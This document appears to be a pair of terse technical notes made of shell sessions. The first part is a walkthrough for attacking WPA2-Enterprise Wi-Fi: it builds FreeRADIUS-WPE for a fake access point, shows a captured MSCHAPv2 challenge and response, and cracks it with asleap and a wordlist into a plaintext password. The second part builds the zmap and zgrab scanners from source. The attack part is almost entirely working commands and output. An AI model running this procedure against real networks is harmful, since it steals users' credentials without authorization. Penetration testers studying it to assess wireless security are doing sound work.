# Cracking WPA2-Enterprise wireless networks with FreeRADIUS-WPE and a fake AP


# wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
# wget --no-check-certificate https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
# tar xvjf freeradius-server-2.1.12.tar.bz2
# cd freeradius-server-2.1.12
# patch -p1 < ../freeradius-wpe.patch
# ./configure
# make
# make install
# ldconfig
# cd /usr/local/etc/raddb/certs/
# ./bootstrap
# /usr/local/sbin/radiusd -v
radiusd: FreeRADIUS-WPE Version 2.1.12
# grep with_ntdomain_hack /usr/local/etc/raddb/modules/mschap
with_ntdomain_hack = yes
# radiusd -X

# cat /usr/local/var/log/radius/freeradius-server-wpe.log
mschap: Sun Jan 31 22:00:00 2016

 username: aaaaaaa
 challenge: 6e:61:f4:26:7a:c5:96:12
 response: 0c:b6:46:9e:0f:70:fb:e7:ba:6b:0d:72:7a:71:63:fa:c2:e3:5b:c5:eb:04:6c:b5
 john NETNTLM: aaaaaaa:$NETNTLM$6e61f4267ac59612$0cb6469e0f70fbe7ba6b0d727a7163fac2e35bc5eb046cb5

# asleap -C 6e:61:f4:26:7a:c5:96:12 -R 0c:b6:46:9e:0f:70:fb:e7:ba:6b:0d:72:7a:71:63:fa:c2:e3:5b:c5:eb:04:6c:b5 -W dictionary.txt

 hash bytes: 5b0a
 NT hash: 2aff86e7f6e8bd54841a7981c0a55b0a
 password: bbbbbbbb

Reference

https://github.com/brad-anton/freeradius-wpe

# Installing zmap and zgrab from source


# cd
# mkdir work
# cd work
# git clone https://github.com/zmap/zmap.git
# apt-get install build-essential cmake libgmp3-dev gengetopt libpcap-dev flex byacc libjson-c-dev pkg-config libunistring-dev
# cd zmap
# cmake .
# make -j4
# make install
# cd
# wget https://storage.googleapis.com/golang/go1.5.3.linux-amd64.tar.gz
# tar -C /usr/local -xzf go1.5.3.linux-amd64.tar.gz
# export PATH=$PATH:/usr/local/go/bin
# go version
# export GOPATH=/root/work
# go get github.com/zmap/zgrab
# cd work/src/github.com/zmap/zgrab/
# go build